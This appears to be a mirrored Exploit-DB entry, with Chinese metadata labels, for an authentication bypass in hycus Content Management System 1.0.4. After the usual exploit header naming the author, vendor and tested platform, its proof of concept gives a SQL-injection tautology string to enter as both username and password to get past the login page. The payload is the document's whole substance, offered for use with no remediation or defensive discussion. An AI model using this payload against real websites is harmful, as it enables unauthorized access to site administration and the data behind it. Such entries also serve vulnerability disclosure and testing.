hycus CMS 1.0.4 – Authentication Bypass

  • 作者: Berk Dusunur
    日期: 2018-06-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44954/
  • # Exploit Title: hycus Content Management System v1.0.4 Login Page Bypass
    # Google Dork:N/A
    # Date: 28.06.2018
    # Exploit Author: Berk Dusunur
    # Vendor Homepage: http://www.hycus.com/
    # Software Link: http://demosite.center/hycus/
    # Version: 1.0.4
    # Tested on: Pardus / Debian Web Server
    # CVE : N/A
    
    #Proof Of Concept
    
    use login bypass payload for username= '=' 'OR' for password= '=' 'OR'